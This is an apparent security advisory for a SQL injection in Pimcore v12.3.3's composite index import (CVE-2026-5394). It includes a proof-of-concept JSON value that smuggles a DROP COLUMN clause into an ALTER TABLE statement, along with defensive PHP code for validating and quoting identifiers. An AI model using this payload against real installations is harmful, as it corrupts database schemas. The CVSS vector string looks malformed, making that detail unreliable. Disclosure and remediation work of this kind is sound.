# Pimcore Platform v12.3.3 SQL Injection Vulnerability Summary

## Vulnerability Overview

* **Vulnerability Name**: Pimcore Platform v12.3.3 - DataObject composite index handling SQL Injection
* **Vulnerability Type**: SQL Injection
* **Severity**: High
* **CVSS Score**: 7.0 (CVSS:3.0/AV:N/AC:L/AT:N/PR:H/UI:N/V:C/I:L/A:L/S:C/N/S/N/SAN)
* **CVE ID**: CVE-2026-5394
* **Discoverer**: Oscar Naveda (Fluid Attacks AI SAST Scanner)
* **Root Cause**: When a DataObject class definition is imported or saved, the system accepts `compositeIndices` data from JSON. While building the `ALTER TABLE` statement, the backend performs no strict identifier validation or escaping on the `index_columns` field and concatenates it directly into the SQL string, so an attacker who controls that field can inject SQL.

## Impact Scope

* **Affected Systems**: Pimcore Platform v12.3.3
* **Exploitation Conditions**: Requires an authenticated administrative user with permission to import or save class definitions.
* **Potential Impacts**:
  * Unauthorized modification of object query/storage table schemas.
  * Denial of Service (DoS) of backend services by disrupting the expected table layout.
  * Compromise of data integrity for DataObject storage and queries.

## Remediation

* **Current Status**: There is currently no patch available for this vulnerability.
* **Recommended Measures**: Users should monitor official security updates, or implement strict whitelist validation and identifier escaping for imported JSON data at the application layer.

## Proof-of-Concept Code (PoC)

### 1. Malicious JSON Snippet

The attacker injects SQL by modifying the `index_columns` field in the JSON:

```json
{
  "compositeIndices": [
    {
      "index_key": "poc_idx",
      "index_type": "query",
      "index_columns": [
        "slider), DROP COLUMN co_classname -- "
      ]
    }
  ]
}
```

### 2. Generated Malicious SQL Statement

The above JSON causes the backend to generate the following SQL statement:

```sql
ALTER TABLE `object_query_` ADD INDEX `poc_idx` (`slider), DROP COLUMN co_classname -- `);
```

### 3. Vulnerability Trigger Code Path (Source-to-Sink)

The vulnerable core code is located in `models/DataObject/ClassDefinition/Service.php` and `models/DataObject/Traits/CompositeIndexTrait.php`:

```php
// Vulnerable point: direct concatenation of unvalidated $columnName
// ($columnName is implode(',', $columns) taken straight from the JSON)
$this->db->executeQuery(
    'ALTER TABLE ' . $table . ' ADD INDEX ' . $key . ' (' . $columnName . ');'
);
```

Here, `$columnName` is generated via `implode(',', $columns)` without any escaping or whitelist validation. Because the whole imploded string is wrapped in a single pair of backticks, the closing backtick and parenthesis inside the first column name terminate the intended identifier and the remainder of the payload becomes part of the statement.
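The remediation section recommends whitelist validation and identifier escaping at the application layer. The following is an added example of what that looks like in PHP; it is not Pimcore's code. The function names, the `IdentifierValidationException` class, the `$allowedColumns` list and the table name `object_query_1` are assumptions made for illustration. It validates every identifier taken from a decoded `compositeIndices` entry against a strict identifier pattern and a known column list, quotes each column separately, and shows that the PoC payload from section 1 is rejected before any SQL is assembled.

```php
<?php
declare(strict_types=1);

// Added example, not Pimcore code. Function names, the exception class and the
// $allowedColumns list are assumptions made for illustration.

final class IdentifierValidationException extends InvalidArgumentException
{
}

/**
 * Accept only a plain, unquoted MySQL identifier: letters, digits, underscore,
 * at most 64 characters. Spaces, parentheses, quotes and comment markers are
 * rejected before they can reach the statement text.
 */
function assertIdentifier(string $name): string
{
    if (preg_match('/\A[A-Za-z_][A-Za-z0-9_]{0,63}\z/', $name) !== 1) {
        throw new IdentifierValidationException(
            'Invalid identifier: ' . json_encode($name, JSON_UNESCAPED_SLASHES)
        );
    }
    return $name;
}

/**
 * Index columns must additionally be members of the table's real column list
 * (in production, load that list from the schema, e.g. via SHOW COLUMNS);
 * the pattern alone would still admit a well-formed but unknown column name.
 */
function assertIndexColumn(string $name, array $allowedColumns): string
{
    assertIdentifier($name);
    if (!in_array($name, $allowedColumns, true)) {
        throw new IdentifierValidationException('Unknown column: ' . $name);
    }
    return $name;
}

/** Backtick-quote one identifier, doubling any embedded backtick (MySQL rules). */
function quoteIdentifier(string $name): string
{
    return '`' . str_replace('`', '``', $name) . '`';
}

/**
 * Build the ADD INDEX statement for one decoded compositeIndices entry.
 * Every piece taken from the JSON is validated and then quoted on its own;
 * the raw implode(',', $columns) concatenation of the vulnerable code is gone.
 */
function buildAddIndexSql(string $table, array $index, array $allowedColumns): string
{
    $columns = $index['index_columns'] ?? [];
    if (!is_array($columns) || $columns === []) {
        throw new IdentifierValidationException('index_columns must be a non-empty array');
    }
    $quotedColumns = [];
    foreach ($columns as $column) {
        if (!is_string($column)) {
            throw new IdentifierValidationException('index_columns entries must be strings');
        }
        $quotedColumns[] = quoteIdentifier(assertIndexColumn($column, $allowedColumns));
    }
    $rawKey = $index['index_key'] ?? null;
    if (!is_string($rawKey)) {
        throw new IdentifierValidationException('index_key must be a string');
    }
    $key = quoteIdentifier(assertIdentifier($rawKey));
    $tbl = quoteIdentifier(assertIdentifier($table));

    return sprintf('ALTER TABLE %s ADD INDEX %s (%s);', $tbl, $key, implode(', ', $quotedColumns));
}

// --- Demonstration with constructed sample data --------------------------
$allowedColumns = ['oo_id', 'slider', 'co_classname']; // constructed column list

// A legitimate entry: both columns exist, so a fully quoted statement is built.
$validIndex = ['index_key' => 'poc_idx', 'index_type' => 'query', 'index_columns' => ['slider', 'oo_id']];
echo buildAddIndexSql('object_query_1', $validIndex, $allowedColumns), PHP_EOL;

// The PoC payload from section 1: rejected at the identifier check, no SQL is assembled.
$pocIndex = json_decode(
    '{"index_key":"poc_idx","index_type":"query","index_columns":["slider), DROP COLUMN co_classname -- "]}',
    true
);
try {
    buildAddIndexSql('object_query_1', $pocIndex, $allowedColumns);
} catch (IdentifierValidationException $e) {
    echo 'Rejected: ', $e->getMessage(), PHP_EOL;
}
```

Quoting each column separately (in a Doctrine DBAL-based code base, `Connection::quoteIdentifier()` does that step) already stops the PoC, because the payload then becomes one backtick-quoted identifier that does not exist rather than fragments of the statement. The column whitelist is the second layer: it turns any unexpected name into a validation error at import time instead of a database error at `ALTER TABLE` time, and it gives a clean signal to log and alert on when imported class definitions contain identifiers that do not match the schema.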